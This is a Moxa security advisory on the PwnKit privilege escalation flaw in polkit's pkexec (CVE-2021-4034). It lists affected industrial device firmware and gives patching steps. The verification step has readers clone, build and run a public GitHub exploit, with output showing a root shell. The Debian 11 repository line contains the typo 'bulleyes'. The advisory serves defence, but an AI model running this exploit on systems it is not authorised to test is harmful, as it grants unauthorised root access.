As of June 15, 2022, this site no longer supports Internet Explorer. Please use another browser for the best experience on our site.

Product support

Security Advisories

SUMMARY

Moxa’s Response Regarding the PwnKit Vulnerability

  • Security Advisory ID: MPSA-220204
  • Version: V1.1
  • Release Date: Jul 14, 2023
  • Reference:
    • Qualys, PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)

The Qualys Research Team has discovered a memory corruption vulnerability in polkit's pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows users without the proper access levels to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration. 

Moxa has investigated the vulnerability and has determined that it affects some of Moxa's devices. In response to this, Moxa has developed solutions to address this vulnerability. Please refer to the Affected Products and Solutions section below to learn more.

AFFECTED PRODUCTS AND SOLUTIONS

Affected Products:

The affected products and firmware versions are shown below.

Product Series Affected Versions
UC-2100 Series Firmware version 1.2 or lower. 
UC-2100-W Series Firmware version 1.2 or lower.
UC-3100 Series Firmware version 1.1 or lower.
UC-5100 Series Firmware version 1.3 or lower.
UC-8100A-ME-T Series Firmware version 1.5 or lower.
V2406C Series Firmware version 1.2 or lower.
V2403C Series Firmware version 1.0 or lower. 
MC-1220 Series Firmware version 1.4 or lower.
DA-681C Series Firmware version 1.1 or lower.
DA-682C Series Firmware version 1.2 or lower.
DA-820C Series Firmware version 1.2 or lower.
AIG-501 Series Firmware version 1.1 or lower.
MPC-2070 Series Firmware version 1.0 or lower.
MPC-2101 Series Firmware version 1.0 or lower.
MPC-2120 Series Firmware version 1.0 or lower.
MPC-2121 Series Firmware version 1.0 or lower.
MPC-2190 Series Firmware version 1.0 or lower.
MPC-2240 Series Firmware version 1.0 or lower.
EXPC-1519 Series Firmware version 1.0 or lower.

 

Solutions:

Moxa has developed appropriate solutions to address the vulnerability. The solutions for affected products are shown below.

Product Series Solutions
All Products that are listed in the Affected Products section

For firmware using Debian or Moxa Industrial Linux (MIL), follow the steps below to upgrade the policykit-1 package to the latest version for CVE-2021-4034. 

Step 1. Check if the Moxa Debian repository is in the apt source list. 

Open moxa.source.list in the vi editor. 

root@Linux:~$ sudo vi /etc/apt/sources.list.d/moxa.sources.list 

 Or 

root@Linux:~$ sudo vi /etc/apt/sources.list  

If it isn’t, add the following line to moxa.source.list

For Debian 9.x, 

deb http://deb.debian.com/debian stretch main contrib non-free  

For Debian 10.x, 

deb http://deb.debian.com/debian buster main contrib non-free  

For Debian 11.x, 

deb http://deb.debian.com/debian bulleyes main contrib non-free  

Step 2. Update the latest apt information. 

root@Linux:~$ apt-get update  

Step 3. Install the latest policykit-1 package for CVE-2021-4034. 

root@Linux:~$ apt-get install policykit-1  

Step 4. Perform a test for this patch. 

First, get the exploit script from github. 

moxa@Linux:~/$ git clone https://github.com/berdav/CVE-2021-4034.git  

Next, build the program. 

moxa@Linux:~/CVE-2021-4034$ make 

cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c 

cc -Wall    cve-2021-4034.c   -o cve-2021-4034 

echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules 

mkdir -p GCONV_PATH=. 

cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.

Then, run the CVE-2021-4034 test program in the system that has not been patched. The test program will get the root privilege. 

moxa@Linux:~/CVE-2021-4034$ ./cve-2021-4034  

# whoami  

root  

Note, if the system has already been patched, when you run the test program it will show this result. 

moxa@Linux:~/CVE-2021-4034$ ./cve-2021-4034  

pkexec --version |  

       --help |  

       --disable-internal-agent |  

       [--user username] PROGRAM [ARGUMENTS...]  

See the pkexec manual page for more details. 

Step 5. Those who can’t patch immediately should use the command below to remove the SUID-bit from pkexec: 

root@Linux:~$ chmod 0755 /usr/bin/pkexec

 

Revision History:

VERSION DESCRIPTION RELEASE DATE
1.0 First Release March 09, 2022
1.1 Change AIG-500 to AIG-501 July 14, 2023

Relevant Products

AIG-501 Series · DA-681C Series · DA-682C Series · DA-820C Series · EXPC-1519 Series · MC-1200 Series · MPC-2070 Series · MPC-2101 Series · MPC-2120 Series · MPC-2121 Series · MPC-2190 Series · MPC-2240 Series · UC-2100 Series · UC-2100-W Series · UC-3100 Series · UC-5100 Series · UC-8100A-ME-T Series · V2403C Series · V2406C Series ·

  •   Print this page
  • You can manage and share your saved list in My Moxa
Let’s get that fixed

If you are concerned about a potential cybersecurity vulnerability, please contact us and one of technical support staff will get in touch with you.

Report a Vulnerability
Added To Bag
You have some items waiting in your bag; click here to finish your quote!
Feedback